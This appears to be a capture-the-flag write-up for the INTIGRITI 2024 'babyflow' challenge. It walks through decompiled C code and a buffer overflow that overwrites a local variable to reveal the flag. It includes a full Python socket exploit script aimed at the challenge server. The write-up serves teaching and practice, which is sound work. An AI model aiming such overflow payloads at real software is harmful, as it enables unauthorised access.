Capture The Flag
  • 🏠 Home
  • CTF 2024
    • 🖥INTIGRITI 2024
      • Warmup - Babyflow
      • OSINT - Bob L'éponge
  • CTF 2022
    • 🖥 ROOTCON 16 Pre-Qualifier
      • 1️⃣ Easy 300: Illusive Mind with Illusive Thoughts
      • 2️⃣ Easy 300: Hack and Take a Break
    • 🖥 HTB Cyber Apocalypse 2022 Intergalactic Chase
      • 1️⃣ Web 300: Kryptos Support
      • 2️⃣ Web 300: BlinkerFluids
  • CTF 2021
    • 🖥 ROOTCON 15 CTF
      • Exploitation 4
      • Exploitation 6
      • Web 200
    • 🖥 HTB Business CTF 2021
      • Time
      • NoteQL
  • CTF 2020
    • 🖥 ROOTCON RECOVERY MODE
      • Forensics (Warm Up)
      • Web (Wizardry)
Powered by GitBook
On this page
  • Challenge
  • Warmup PWN Challenge: babyflow Writeup
  • Analyzing the Binary
  • Step 2: Crafting the Exploit
  • Step 3: Writing the Python Exploit
  • Step 4: Running the Exploit
  • Conclusion
  1. CTF 2024
  2. 🖥INTIGRITI 2024

Warmup - Babyflow

Previous🖥INTIGRITI 2024NextOSINT - Bob L'éponge

Last updated 6 months ago

Challenge

Warmup PWN Challenge: babyflow Writeup

In this writeup, we'll walk through solving the "Warmup" PWN challenge step by step. The goal is to exploit a buffer overflow vulnerability to bypass a password check and reveal the flag.

Analyzing the Binary

We start by running binary ninja to decompile the file.

We examine the decompiled code snippet:

int32_t main(int32_t argc, char** argv, char** envp)
{
    int32_t var_c = 0;
    printf("Enter password: ");
    fgets(&buf, 50, stdin);

    if (strncmp(&buf, "SuPeRsEcUrEPaSsWoRd123", 22) != 0)
        puts("Incorrect Password!");
    else
        puts("Correct Password!");

    if (var_c == 0)
        puts("Are you sure you are admin? o.O");
    else
        puts("INTIGRITI{the_flag_is_different_…}");

    return 0;
}

Trying to use the password

Key Points:

  • The program asks for a password input and checks it using strncmp against the hardcoded string "SuPeRsEcUrEPaSsWoRd123".

  • If the password is correct, it checks the value of var_c.

    • If var_c is still 0, it prints a message asking if you are the admin.

    • If var_c is non-zero, it reveals the flag.

Step 2: Crafting the Exploit

We need to:

  1. Input the correct password to pass the check.

  2. Overflow the buffer to modify var_c and set it to a non-zero value, which will reveal the flag.

Buffer Overflow:

  • The buffer size is 50 bytes, and the password takes up the first 22 bytes.

  • That leaves 28 bytes for padding and overflow.

  • We need to overflow into var_c (a 4-byte integer) and set it to 1.

Step 3: Writing the Python Exploit

Now, let's write a Python script to send the payload to the server.

import socket

# Connect to the remote server
host = 'babyflow.ctf.intigriti.io'
port = 1331

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))

# Receive and print the initial message
response = s.recv(1024).decode('utf-8')
print(response)

# Prepare the exploit payload
password = "SuPeRsEcUrEPaSsWoRd123"
padding = "A" * (50 - len(password))  # Fill the buffer space
overflow_payload = padding + "\x01\x00\x00\x00"  # Overwrite var_c with 1

# Send the payload
s.sendall((password + overflow_payload + "\n").encode('utf-8'))

# Receive and print the flag
response = s.recv(1024).decode('utf-8')
print(response)

# Close the connection
s.close()

Step 4: Running the Exploit

Once the script is ready, simply run it using:

python babyflow.py

If the exploit is successful, the program will print the flag:

Conclusion

This challenge demonstrates a classic buffer overflow attack. We bypass the password check by inputting the correct password, then overflow the buffer to manipulate a local variable (var_c). When var_c is changed from 0 to 1, the program reveals the flag.

By following these steps, we successfully exploited the vulnerability and obtained the flag. This writeup covers the basic principles of exploiting buffer overflows in C programs and how to automate the process using Python.